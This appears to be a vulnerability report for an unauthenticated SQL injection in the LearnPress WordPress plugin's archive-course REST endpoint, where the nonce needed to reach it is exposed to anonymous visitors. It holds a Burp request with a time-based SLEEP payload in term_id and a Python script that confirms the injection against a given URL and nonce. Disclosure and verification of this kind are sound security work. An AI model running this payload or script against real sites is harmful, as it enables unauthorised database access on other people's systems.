Description :

Due to missing SQL sanitization, the REST endpoint wp-json/lp/v1/courses/archive-course is vulnerable to unauthenticated SQL injection through the term_id query-string parameter. The endpoint requires an X-WP-Nonce header, but the nonce is readable by unauthenticated visitors on the frontend (see below), so the nonce check does not stop the attack.

Plugin : https://wordpress.org/plugins/learnpress/

Taint Analysis :

(taint-analysis screenshots attached to the original report; not reproduced here)

The X-WP-Nonce value required by the endpoint is exposed on the frontend to unauthenticated users, so no account is needed to obtain a valid nonce. (screenshot attached to the original report; not reproduced here)

POC :

I used a time-based SLEEP() payload as a simple PoC (the Burp request below uses SLEEP(5)); an attacker can inject any other payload in its place, since the term_id value reaches the query unsanitized.

Note: the request must carry the X-WP-Nonce header, with the nonce value taken from the frontend as described above.

Video PoC: unauth_sqli_learnpress.mp4

BURP Request :

POST /wordpress-6.4.2/wordpress/wp-json/lp/v1/courses/archive-course?term_id=1337)+OR+SLEEP(5)+--+A HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost/wordpress-6.4.2/wordpress/courses/
X-WP-Nonce: da35ff2e0c
Content-Type: application/json
Content-Length: 0
Origin: http://localhost
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
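The following script is an added example, not the reporter's PoC (the reporter's evidence is the video and the Burp request above). It reproduces the time-based check in a form that defeats the usual false positive: it sends a benign term_id and the SLEEP payload back to back, repeats the pair, and only reports the endpoint as vulnerable if every injected request is slower than its baseline by most of the requested delay. It assumes only what the report shows (a POST to wp-json/lp/v1/courses/archive-course with term_id in the query string and an X-WP-Nonce header); the base URL and nonce are command-line arguments, since the report says the nonce is readable from the frontend by an unauthenticated user.

```python
"""Time-based blind SQLi confirmation for the LearnPress archive-course endpoint.

Added example, not the original reporter's PoC. Assumes only what the report
shows: a POST to wp-json/lp/v1/courses/archive-course with term_id in the
query string and a valid X-WP-Nonce header. The nonce is passed on the command
line because the report states it is readable from the frontend by an
unauthenticated user.
"""
import sys
import time
import urllib.error
import urllib.parse
import urllib.request

ENDPOINT = "wp-json/lp/v1/courses/archive-course"


def sleep_payload(seconds: int, term_id: int = 1337) -> str:
    """Build the term_id value used in the report.

    '1337)' closes the parenthesis the plugin opens around term_id,
    'OR SLEEP(n)' adds the delay, and '-- A' comments out the rest of the
    statement (MySQL requires whitespace after '--', hence the trailing 'A').
    """
    return f"{term_id}) OR SLEEP({seconds}) -- A"


def build_url(base: str, term_id_value: str) -> str:
    """Full endpoint URL with term_id URL-encoded in the query string."""
    query = urllib.parse.urlencode({"term_id": term_id_value})
    return f"{base.rstrip('/')}/{ENDPOINT}?{query}"


def timed_post(url: str, nonce: str, timeout: float = 30.0) -> float:
    """POST with an empty JSON body, as in the Burp request; return elapsed seconds.

    A 4xx/5xx response still counts: a body that arrives only after the SLEEP
    is just as telling as a 200.
    """
    req = urllib.request.Request(
        url,
        data=b"",
        method="POST",
        headers={"X-WP-Nonce": nonce, "Content-Type": "application/json", "Accept": "*/*"},
    )
    start = time.monotonic()
    try:
        urllib.request.urlopen(req, timeout=timeout).read()
    except urllib.error.HTTPError as err:
        err.read()
    return time.monotonic() - start


def looks_vulnerable(baseline: float, injected: float, delay: int, slack: float = 0.8) -> bool:
    """The injected request must exceed the benign one by most of the requested delay."""
    return injected - baseline >= delay * slack


def confirm(base: str, nonce: str, delay: int = 5, trials: int = 2) -> bool:
    """Compare a benign term_id against the SLEEP payload, repeated to rule out jitter.

    Every trial must show the delay; one slow response from a busy server is
    not evidence of injection.
    """
    benign_url = build_url(base, "1337")
    injected_url = build_url(base, sleep_payload(delay))
    for _ in range(trials):
        baseline = timed_post(benign_url, nonce)
        injected = timed_post(injected_url, nonce)
        if not looks_vulnerable(baseline, injected, delay):
            return False
    return True


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit(f"usage: {sys.argv[0]} http://host/wordpress <X-WP-Nonce>")
    print("vulnerable" if confirm(sys.argv[1], sys.argv[2]) else "not confirmed")
```

Run it as `python3 confirm.py http://localhost/wordpress-6.4.2/wordpress da35ff2e0c` against a test instance only; the delay and trial count are parameters of confirm() so the check can be tightened on a noisy network.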